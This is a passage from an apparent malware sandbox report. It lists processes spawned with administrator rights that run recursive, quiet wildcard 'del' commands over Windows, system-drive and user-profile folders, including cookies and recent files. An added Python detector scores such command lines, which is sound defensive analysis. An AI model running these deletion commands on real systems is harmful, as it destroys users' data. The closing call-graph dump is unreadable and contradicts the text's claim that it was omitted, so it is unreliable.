                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:97
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:98
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:99
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:100
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:101
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:102
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:103
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:104
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:105
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:106
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:107
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:108
                              Start time:03:16:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

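The cmd.exe entries above (Target IDs 74 through 108) all have the same shape: cmd.exe /k followed by a chain of del /f /s /q commands over wildcards under %windir%, %systemdrive% and %userprofile%, ending in exit. Two details are worth recording while reading them. First, Path shows C:\Windows\SysWOW64\cmd.exe while the command line names C:\Windows\System32\cmd.exe: that is WoW64 file-system redirection, because the 32-bit sample is the parent, and it is a useful pivot when hunting for the spawning process. Second, the third del in Target IDs 77 and 93 is written as %systemdrive%*.sqm with no backslash, so it expands to C:*.sqm, a path relative to the current directory on that drive rather than to the drive root. The script below is an added example, not part of the Joe Sandbox report: it takes process-creation events carrying these command lines (constructed here from the entries above plus two benign events), splits them into individual del targets, and scores each event on quiet, recursive, wildcard deletion under sensitive roots. The SENSITIVE_ROOTS list, the scoring weights and the threshold are assumptions for illustration, not values from the report or from any published Sigma rule.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Roots under which a wildcard, recursive, quiet delete is rarely legitimate
# for a user-launched process. Assumed list for this example.
SENSITIVE_ROOTS = ("%windir%", "%systemroot%", "%systemdrive%", "%userprofile%",
                   "%appdata%", "%localappdata%", "%temp%", "%tmp%")

# One `del` invocation inside a single cmd.exe command: its switches (/f, /s,
# /q, /a ...) and the target path, which may contain spaces.
DEL_RE = re.compile(r"\bdel\s+((?:/[a-z]\s+)*)(.+?)\s*$", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    image: str
    targets: List[str] = field(default_factory=list)
    recursive: bool = False          # any del used /s
    quiet: bool = False              # any del used /q
    wow64_redirected: bool = False   # image is SysWOW64 but cmdline says System32
    score: int = 0


def split_commands(cmdline: str) -> List[str]:
    """Split a cmd.exe line on its separators (`&&` must be tried before `&`)."""
    return [p.strip() for p in re.split(r"&&|&", cmdline) if p.strip()]


def analyse(event: Dict) -> Finding:
    """Extract the del targets from one process-creation event and score it."""
    f = Finding(pid=event["pid"], image=event["image"])
    for part in split_commands(event["cmdline"]):
        m = DEL_RE.search(part)
        if not m:
            continue
        switches = m.group(1).lower().split()
        target = m.group(2).strip().strip('"')
        f.targets.append(target)
        f.recursive |= "/s" in switches
        f.quiet |= "/q" in switches
        low = target.lower()
        if "*" in low and low.startswith(SENSITIVE_ROOTS):
            f.score += 2   # wildcard delete under a sensitive root
        elif "*" in low:
            f.score += 1   # wildcard delete elsewhere
    f.score += int(f.recursive) + int(f.quiet)
    # A 32-bit parent asking for System32\cmd.exe gets SysWOW64\cmd.exe via
    # WoW64 file-system redirection, which is what the report's entries show.
    f.wow64_redirected = ("\\syswow64\\" in f.image.lower()
                          and "\\system32\\" in event["cmdline"].lower())
    return f


def is_suspicious(f: Finding, threshold: int = 4) -> bool:
    return f.score >= threshold


def scan(events: List[Dict], threshold: int = 4) -> List[int]:
    """Return the PIDs of the events that cross the threshold."""
    return [f.pid for f in map(analyse, events) if is_suspicious(f, threshold)]


# Constructed process-creation events: the first three copy the command lines
# of Target IDs 74, 77 and 86 from the report; the last two are benign.
SAMPLE_EVENTS = [
    {"pid": 74, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit'},
    {"pid": 77, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & '
                r'del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit'},
    {"pid": 86, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & '
                r'del /f /q %userprofile%\cookies\*.* & exit'},
    {"pid": 4242, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c del /q C:\Users\alice\Desktop\old_notes.txt'},
    {"pid": 4243, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c dir C:\Users\alice'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        f = analyse(ev)
        print(f"pid={f.pid:<5} score={f.score} suspicious={is_suspicious(f)} "
              f"wow64={f.wow64_redirected} targets={f.targets}")
```

With the assumed weights, the single-target entry (Target ID 74) lands exactly on the threshold and the multi-target entries score well above it, while a one-off del of a named file in a user's profile stays below it. In a real pipeline the event fields would come from Sysmon event 1 or Windows 4688 (Image and CommandLine), and the parent image from the same record would confirm the 32-bit sample as the spawner.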

                                Execution Graph

                                Execution Coverage:11.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:23%
                                Total number of Nodes:1226
                                Total number of Limit Nodes:22
                                execution_graph: rendered in the original report as an interactive call graph. The extracted page carried only its flattened node/edge text (numeric node IDs, function entry addresses in the sample's 0x401xxx-0x405xxx range, and call/return edges), which is not readable as text and is omitted here. The Win32 imports named on the graph's labelled nodes are the recoverable content:
                                Process, file and directory: CreateProcessA, ShellExecuteA, ExitProcess, ExitWindowsEx, GetCurrentProcess, CreateFileA, GetFileAttributesA, GetFileSize, ReadFile, SetFilePointer, CopyFileA, MoveFileA, DeleteFileA, CreateDirectoryA, SetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, GetSystemDirectoryA, CloseHandle
                                Loader and environment: LoadLibraryA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetCommandLineA, GetVersion, GetTickCount, SetErrorMode, GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                Registry, shell and COM: RegOpenKeyExA, RegQueryValueExA, RegCloseKey, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetFileInfoA, CoTaskMemFree, OleInitialize, CoUninitialize, one import by ordinal (#17)
                                Window and GDI: RegisterClassA, GetDlgItem, SetDlgItemTextA, SendMessageA, ShowWindow, SetWindowTextA, GetWindowLongA, SetWindowLongA, LoadImageA, ImageList_Destroy, MessageBoxIndirectA, InvalidateRect, GetClientRect, GetMessagePos, ScreenToClient, GetSysColor, SetTextColor, SetBkMode, SetBkColor, CreateBrushIndirect, DeleteObject
                                String and memory: lstrcpynA, lstrlenA, lstrcatA, lstrcmpiA, wsprintfA, CharNextA, CharPrevA, GlobalAlloc, GlobalFree
3203 4036c9 SystemParametersInfoA CreateWindowExA 3200->3203 3206 403619 lstrcmpiA 3201->3206 3207 40363f 3201->3207 3202->3088 3203->3199 3208 40371c 3204->3208 3210 403609 3205->3210 3206->3207 3211 403629 GetFileAttributesA 3206->3211 3209 4054d0 3 API calls 3207->3209 3208->3202 3212 4037ef 19 API calls 3208->3212 3213 403645 3209->3213 3210->3201 3214 403635 3211->3214 3215 40372d 3212->3215 3322 4059dd lstrcpynA 3213->3322 3214->3207 3217 405517 2 API calls 3214->3217 3218 403739 ShowWindow LoadLibraryA 3215->3218 3219 4037bc 3215->3219 3217->3207 3220 403758 LoadLibraryA 3218->3220 3221 40375f GetClassInfoA 3218->3221 3323 404e4d OleInitialize 3219->3323 3220->3221 3223 403773 GetClassInfoA RegisterClassA 3221->3223 3224 403789 DialogBoxParamA 3221->3224 3223->3224 3226 40140b 2 API calls 3224->3226 3225 4037c2 3227 4037c6 3225->3227 3228 4037de 3225->3228 3231 4037b1 3226->3231 3227->3202 3230 40140b 2 API calls 3227->3230 3229 40140b 2 API calls 3228->3229 3229->3202 3230->3202 3231->3202 3232->3076 3338 4059dd lstrcpynA 3233->3338 3235 4055c2 3236 405564 4 API calls 3235->3236 3237 4055c8 3236->3237 3238 403289 3237->3238 3239 405c3f 5 API calls 3237->3239 3238->3088 3248 4059dd lstrcpynA 3238->3248 3240 4055d8 3239->3240 3240->3238 3245 4055eb 3240->3245 3241 405603 lstrlenA 3242 40560e 3241->3242 3241->3245 3244 4054d0 3 API calls 3242->3244 3243 405cd8 2 API calls 3243->3245 3246 405613 GetFileAttributesA 3244->3246 3245->3238 3245->3241 3245->3243 3247 405517 2 API calls 3245->3247 3246->3238 3247->3241 3248->3119 3249->3090 3250->3111 3251->3132 3253 405cff 3 API calls 3252->3253 3254 405736 3253->3254 3255 405793 GetShortPathNameA 3254->3255 3257 405888 3254->3257 3339 4056b4 GetFileAttributesA CreateFileA 3254->3339 3256 4057a8 3255->3256 3255->3257 3256->3257 3259 4057b0 wsprintfA 3256->3259 3257->3132 3262 4059ff 18 API calls 3259->3262 3260 405777 CloseHandle GetShortPathNameA 3260->3257 3261 40578b 3260->3261 3261->3255 3261->3257 3263 4057d8 
3262->3263 3340 4056b4 GetFileAttributesA CreateFileA 3263->3340 3265 4057e5 3265->3257 3266 4057f4 GetFileSize GlobalAlloc 3265->3266 3267 405881 CloseHandle 3266->3267 3268 405812 ReadFile 3266->3268 3267->3257 3268->3267 3269 405826 3268->3269 3269->3267 3341 405629 lstrlenA 3269->3341 3272 405895 3274 405629 4 API calls 3272->3274 3273 40583b 3346 4059dd lstrcpynA 3273->3346 3276 405849 3274->3276 3277 40585c SetFilePointer WriteFile GlobalFree 3276->3277 3277->3267 3279 405278 3278->3279 3280 40526c CloseHandle 3278->3280 3279->3132 3280->3279 3282 401389 2 API calls 3281->3282 3283 401420 3282->3283 3283->3093 3285 4056ee GetTickCount GetTempFileNameA 3284->3285 3286 4030c9 3285->3286 3287 40571a 3285->3287 3286->3078 3287->3285 3287->3286 3288->3151 3289->3153 3291 405524 3290->3291 3292 402c8e 3291->3292 3293 405529 CharPrevA 3291->3293 3294 4059dd lstrcpynA 3292->3294 3293->3291 3293->3292 3294->3157 3296 402bc7 3295->3296 3297 402bdf 3295->3297 3300 402bd0 DestroyWindow 3296->3300 3301 402bd7 3296->3301 3298 402be7 3297->3298 3299 402bef GetTickCount 3297->3299 3308 405d38 3298->3308 3303 402c20 3299->3303 3304 402bfd CreateDialogParamA ShowWindow 3299->3304 3300->3301 3301->3160 3303->3160 3304->3303 3306->3167 3307->3166 3309 405d55 PeekMessageA 3308->3309 3310 402bed 3309->3310 3311 405d4b DispatchMessageA 3309->3311 3310->3160 3311->3309 3313 403803 3312->3313 3330 40593b wsprintfA 3313->3330 3315 403874 3316 4059ff 18 API calls 3315->3316 3317 403880 SetWindowTextA 3316->3317 3318 4035a1 3317->3318 3319 40389c 3317->3319 3318->3190 3319->3318 3320 4059ff 18 API calls 3319->3320 3320->3319 3321->3186 3322->3192 3331 403ddb 3323->3331 3325 404e97 3326 403ddb SendMessageA 3325->3326 3328 404ea9 OleUninitialize 3326->3328 3327 404e70 3327->3325 3334 401389 3327->3334 3328->3225 3330->3315 3332 403df3 3331->3332 3333 403de4 SendMessageA 3331->3333 3332->3327 3333->3332 3336 401390 3334->3336 3335 4013fe 3335->3327 3336->3335 3337 4013cb MulDiv 
SendMessageA 3336->3337 3337->3336 3338->3235 3339->3260 3340->3265 3342 40565f lstrlenA 3341->3342 3343 405669 3342->3343 3344 40563d lstrcmpiA 3342->3344 3343->3272 3343->3273 3344->3343 3345 405656 CharNextA 3344->3345 3345->3342 3346->3276 3523 404ccb 3524 404cf0 3523->3524 3525 404cd9 3523->3525 3527 404cfe IsWindowVisible 3524->3527 3533 404d15 3524->3533 3526 404cdf 3525->3526 3541 404d59 3525->3541 3530 403ddb SendMessageA 3526->3530 3529 404d0b 3527->3529 3527->3541 3528 404d5f CallWindowProcA 3531 404ce9 3528->3531 3532 40464a 5 API calls 3529->3532 3530->3531 3532->3533 3533->3528 3542 4059dd lstrcpynA 3533->3542 3535 404d44 3543 40593b wsprintfA 3535->3543 3537 404d4b 3538 40140b 2 API calls 3537->3538 3539 404d52 3538->3539 3544 4059dd lstrcpynA 3539->3544 3541->3528 3542->3535 3543->3537 3544->3541 3347 40344c 3348 403464 3347->3348 3349 403456 CloseHandle 3347->3349 3354 403491 3348->3354 3349->3348 3355 40349f 3354->3355 3356 403469 3355->3356 3357 4034a4 FreeLibrary GlobalFree 3355->3357 3358 405302 3356->3358 3357->3356 3357->3357 3359 4055b1 18 API calls 3358->3359 3360 405316 3359->3360 3361 405336 3360->3361 3362 40531f DeleteFileA 3360->3362 3363 40546b 3361->3363 3396 4059dd lstrcpynA 3361->3396 3392 403475 3362->3392 3368 405cd8 2 API calls 3363->3368 3363->3392 3365 405360 3366 405371 3365->3366 3367 405364 lstrcatA 3365->3367 3370 405517 2 API calls 3366->3370 3369 405377 3367->3369 3371 405490 3368->3371 3372 405385 lstrcatA 3369->3372 3373 405390 lstrlenA FindFirstFileA 3369->3373 3370->3369 3374 4054d0 3 API calls 3371->3374 3371->3392 3372->3373 3373->3363 3386 4053b4 3373->3386 3376 40549a 3374->3376 3375 4054fb CharNextA 3375->3386 3377 405695 2 API calls 3376->3377 3378 4054a0 RemoveDirectoryA 3377->3378 3379 4054c2 3378->3379 3380 4054ab 3378->3380 3381 404d7b 25 API calls 3379->3381 3385 404d7b 25 API calls 3380->3385 3380->3392 3381->3392 3382 40544a FindNextFileA 3384 405462 FindClose 3382->3384 3382->3386 3384->3363 3387 4054b9 
3385->3387 3386->3375 3386->3382 3388 405695 2 API calls 3386->3388 3391 405302 59 API calls 3386->3391 3393 404d7b 25 API calls 3386->3393 3394 404d7b 25 API calls 3386->3394 3395 40572b 38 API calls 3386->3395 3397 4059dd lstrcpynA 3386->3397 3389 40572b 38 API calls 3387->3389 3390 405417 DeleteFileA 3388->3390 3389->3392 3390->3386 3391->3386 3393->3382 3394->3386 3395->3386 3396->3365 3397->3386 3545 4025cc 3546 4025d3 3545->3546 3547 402838 3545->3547 3553 4029d9 3546->3553 3549 4025de 3550 4025e5 SetFilePointer 3549->3550 3550->3547 3551 4025f5 3550->3551 3556 40593b wsprintfA 3551->3556 3554 4059ff 18 API calls 3553->3554 3555 4029ed 3554->3555 3555->3549 3556->3547 3557 4041cd 3558 40420b 3557->3558 3559 4041fe 3557->3559 3560 404214 GetDlgItem 3558->3560 3567 404277 3558->3567 3618 405282 GetDlgItemTextA 3559->3618 3562 404228 3560->3562 3566 40423c SetWindowTextA 3562->3566 3570 405564 4 API calls 3562->3570 3563 40435b 3615 4044e7 3563->3615 3620 405282 GetDlgItemTextA 3563->3620 3564 404205 3565 405c3f 5 API calls 3564->3565 3565->3558 3571 403d8f 19 API calls 3566->3571 3567->3563 3572 4059ff 18 API calls 3567->3572 3567->3615 3569 403df6 8 API calls 3574 4044fb 3569->3574 3575 404232 3570->3575 3576 40425a 3571->3576 3577 4042ed SHBrowseForFolderA 3572->3577 3573 404387 3578 4055b1 18 API calls 3573->3578 3575->3566 3582 4054d0 3 API calls 3575->3582 3579 403d8f 19 API calls 3576->3579 3577->3563 3580 404305 CoTaskMemFree 3577->3580 3581 40438d 3578->3581 3583 404268 3579->3583 3584 4054d0 3 API calls 3580->3584 3621 4059dd lstrcpynA 3581->3621 3582->3566 3619 403dc4 SendMessageA 3583->3619 3586 404312 3584->3586 3590 404349 SetDlgItemTextA 3586->3590 3593 4059ff 18 API calls 3586->3593 3588 4043a4 3592 405cff 3 API calls 3588->3592 3589 404270 3591 405cff 3 API calls 3589->3591 3590->3563 3591->3567 3600 4043ac 3592->3600 3594 404331 lstrcmpiA 3593->3594 3594->3590 3596 404342 lstrcatA 3594->3596 3595 4043e6 3622 4059dd lstrcpynA 3595->3622 
3596->3590 3598 4043ef 3599 405564 4 API calls 3598->3599 3601 4043f5 GetDiskFreeSpaceA 3599->3601 3600->3595 3604 405517 2 API calls 3600->3604 3605 404439 3600->3605 3603 404417 MulDiv 3601->3603 3601->3605 3603->3605 3604->3600 3606 404496 3605->3606 3608 404568 21 API calls 3605->3608 3607 4044b9 3606->3607 3610 40140b 2 API calls 3606->3610 3623 403db1 EnableWindow 3607->3623 3609 404488 3608->3609 3611 404498 SetDlgItemTextA 3609->3611 3612 40448d 3609->3612 3610->3607 3611->3606 3614 404568 21 API calls 3612->3614 3614->3606 3615->3569 3616 4044d5 3616->3615 3624 404162 3616->3624 3618->3564 3619->3589 3620->3573 3621->3588 3622->3598 3623->3616 3625 404170 3624->3625 3626 404175 SendMessageA 3624->3626 3625->3626 3626->3615 3627 401f51 3628 401f63 3627->3628 3629 402012 3627->3629 3630 4029f6 18 API calls 3628->3630 3632 401423 25 API calls 3629->3632 3631 401f6a 3630->3631 3633 4029f6 18 API calls 3631->3633 3637 402169 3632->3637 3634 401f73 3633->3634 3635 401f88 LoadLibraryExA 3634->3635 3636 401f7b GetModuleHandleA 3634->3636 3635->3629 3638 401f98 GetProcAddress 3635->3638 3636->3635 3636->3638 3639 401fe5 3638->3639 3640 401fa8 3638->3640 3641 404d7b 25 API calls 3639->3641 3642 401423 25 API calls 3640->3642 3643 401fb8 3640->3643 3641->3643 3642->3643 3643->3637 3644 402006 FreeLibrary 3643->3644 3644->3637 3645 4014d6 3646 4029d9 18 API calls 3645->3646 3647 4014dc Sleep 3646->3647 3649 40288b 3647->3649 3650 403ed7 3651 403ffa 3650->3651 3652 403eed 3650->3652 3653 404069 3651->3653 3656 40413d 3651->3656 3662 40403e GetDlgItem SendMessageA 3651->3662 3654 403d8f 19 API calls 3652->3654 3655 404073 GetDlgItem 3653->3655 3653->3656 3657 403f43 3654->3657 3660 404089 3655->3660 3661 4040fb 3655->3661 3659 403df6 8 API calls 3656->3659 3658 403d8f 19 API calls 3657->3658 3664 403f50 CheckDlgButton 3658->3664 3665 404138 3659->3665 3660->3661 3666 4040af 6 API calls 3660->3666 3661->3656 3667 40410d 3661->3667 3681 403db1 EnableWindow 3662->3681 3679 
403db1 EnableWindow 3664->3679 3666->3661 3670 404113 SendMessageA 3667->3670 3671 404124 3667->3671 3668 404064 3672 404162 SendMessageA 3668->3672 3670->3671 3671->3665 3674 40412a SendMessageA 3671->3674 3672->3653 3673 403f6e GetDlgItem 3680 403dc4 SendMessageA 3673->3680 3674->3665 3676 403f84 SendMessageA 3677 403fa2 GetSysColor 3676->3677 3678 403fab SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3676->3678 3677->3678 3678->3665 3679->3673 3680->3676 3681->3668 3687 4018d8 3688 40190f 3687->3688 3689 4029f6 18 API calls 3688->3689 3690 401914 3689->3690 3691 405302 68 API calls 3690->3691 3692 40191d 3691->3692 3693 4018db 3694 4029f6 18 API calls 3693->3694 3695 4018e2 3694->3695 3696 40529e MessageBoxIndirectA 3695->3696 3697 4018eb 3696->3697 3712 4034e4 3713 4034ef 3712->3713 3714 4034f6 GlobalAlloc 3713->3714 3715 4034f3 3713->3715 3714->3715 3723 401ae5 3724 4029f6 18 API calls 3723->3724 3725 401aec 3724->3725 3726 4029d9 18 API calls 3725->3726 3727 401af5 wsprintfA 3726->3727 3728 40288b 3727->3728 3729 402866 SendMessageA 3730 402880 InvalidateRect 3729->3730 3731 40288b 3729->3731 3730->3731 3732 4019e6 3733 4029f6 18 API calls 3732->3733 3734 4019ef ExpandEnvironmentStringsA 3733->3734 3735 401a03 3734->3735 3737 401a16 3734->3737 3736 401a08 lstrcmpA 3735->3736 3735->3737 3736->3737 3738 402267 3739 4029f6 18 API calls 3738->3739 3740 402275 3739->3740 3741 4029f6 18 API calls 3740->3741 3742 40227e 3741->3742 3743 4029f6 18 API calls 3742->3743 3744 402288 GetPrivateProfileStringA 3743->3744 3745 401c6d 3746 4029d9 18 API calls 3745->3746 3747 401c73 IsWindow 3746->3747 3748 4019d6 3747->3748 3749 4014f0 SetForegroundWindow 3750 40288b 3749->3750 3751 402172 3752 4029f6 18 API calls 3751->3752 3753 402178 3752->3753 3754 4029f6 18 API calls 3753->3754 3755 402181 3754->3755 3756 4029f6 18 API calls 3755->3756 3757 40218a 3756->3757 3758 405cd8 2 API calls 3757->3758 3759 402193 3758->3759 3760 4021a4 lstrlenA lstrlenA 3759->3760 
3761 402197 3759->3761 3763 404d7b 25 API calls 3760->3763 3762 404d7b 25 API calls 3761->3762 3765 40219f 3761->3765 3762->3765 3764 4021e0 SHFileOperationA 3763->3764 3764->3761 3764->3765 3766 4021f4 3767 40220e 3766->3767 3768 4021fb 3766->3768 3769 4059ff 18 API calls 3768->3769 3770 402208 3769->3770 3771 40529e MessageBoxIndirectA 3770->3771 3771->3767 3779 4016fa 3780 4029f6 18 API calls 3779->3780 3781 401701 SearchPathA 3780->3781 3782 40171c 3781->3782 3783 4025fb 3784 402602 3783->3784 3785 40288b 3783->3785 3786 402608 FindClose 3784->3786 3786->3785 3787 40267c 3788 4029f6 18 API calls 3787->3788 3790 40268a 3788->3790 3789 4026a0 3792 405695 2 API calls 3789->3792 3790->3789 3791 4029f6 18 API calls 3790->3791 3791->3789 3793 4026a6 3792->3793 3813 4056b4 GetFileAttributesA CreateFileA 3793->3813 3795 4026b3 3796 40275c 3795->3796 3797 4026bf GlobalAlloc 3795->3797 3800 402764 DeleteFileA 3796->3800 3801 402777 3796->3801 3798 402753 CloseHandle 3797->3798 3799 4026d8 3797->3799 3798->3796 3814 403080 SetFilePointer 3799->3814 3800->3801 3803 4026de 3804 40304e ReadFile 3803->3804 3805 4026e7 GlobalAlloc 3804->3805 3806 4026f7 3805->3806 3807 40272b WriteFile GlobalFree 3805->3807 3808 402e5b 37 API calls 3806->3808 3809 402e5b 37 API calls 3807->3809 3812 402704 3808->3812 3810 402750 3809->3810 3810->3798 3811 402722 GlobalFree 3811->3807 3812->3811 3813->3795 3814->3803 3815 4014fe 3816 401506 3815->3816 3817 401519 3815->3817 3818 4029d9 18 API calls 3816->3818 3818->3817 3819 401000 3820 401037 BeginPaint GetClientRect 3819->3820 3821 40100c DefWindowProcA 3819->3821 3822 4010f3 3820->3822 3824 401179 3821->3824 3825 401073 CreateBrushIndirect FillRect DeleteObject 3822->3825 3826 4010fc 3822->3826 3825->3822 3827 401102 CreateFontIndirectA 3826->3827 3828 401167 EndPaint 3826->3828 3827->3828 3829 401112 6 API calls 3827->3829 3828->3824 3829->3828 3830 404502 3831 404512 3830->3831 3832 40452e 3830->3832 3841 405282 GetDlgItemTextA 3831->3841 
3834 404561 3832->3834 3835 404534 SHGetPathFromIDListA 3832->3835 3837 40454b SendMessageA 3835->3837 3838 404544 3835->3838 3836 40451f SendMessageA 3836->3832 3837->3834 3839 40140b 2 API calls 3838->3839 3839->3837 3841->3836 3842 402303 3843 402309 3842->3843 3844 4029f6 18 API calls 3843->3844 3845 40231b 3844->3845 3846 4029f6 18 API calls 3845->3846 3847 402325 RegCreateKeyExA 3846->3847 3848 40234f 3847->3848 3849 40288b 3847->3849 3850 402367 3848->3850 3851 4029f6 18 API calls 3848->3851 3852 402373 3850->3852 3855 4029d9 18 API calls 3850->3855 3854 402360 lstrlenA 3851->3854 3853 40238e RegSetValueExA 3852->3853 3856 402e5b 37 API calls 3852->3856 3857 4023a4 RegCloseKey 3853->3857 3854->3850 3855->3852 3856->3853 3857->3849 3859 402803 3860 4029d9 18 API calls 3859->3860 3861 402809 3860->3861 3862 402817 3861->3862 3863 40283a 3861->3863 3864 40265c 3861->3864 3862->3864 3867 40593b wsprintfA 3862->3867 3863->3864 3865 4059ff 18 API calls 3863->3865 3865->3864 3867->3864 3868 401b06 3869 401b13 3868->3869 3870 401b57 3868->3870 3873 4021fb 3869->3873 3878 401b2a 3869->3878 3871 401b80 GlobalAlloc 3870->3871 3872 401b5b 3870->3872 3874 4059ff 18 API calls 3871->3874 3886 401b9b 3872->3886 3889 4059dd lstrcpynA 3872->3889 3875 4059ff 18 API calls 3873->3875 3874->3886 3877 402208 3875->3877 3882 40529e MessageBoxIndirectA 3877->3882 3887 4059dd lstrcpynA 3878->3887 3879 401b6d GlobalFree 3879->3886 3881 401b39 3888 4059dd lstrcpynA 3881->3888 3882->3886 3884 401b48 3890 4059dd lstrcpynA 3884->3890 3887->3881 3888->3884 3889->3879 3890->3886 3891 402506 3892 4029d9 18 API 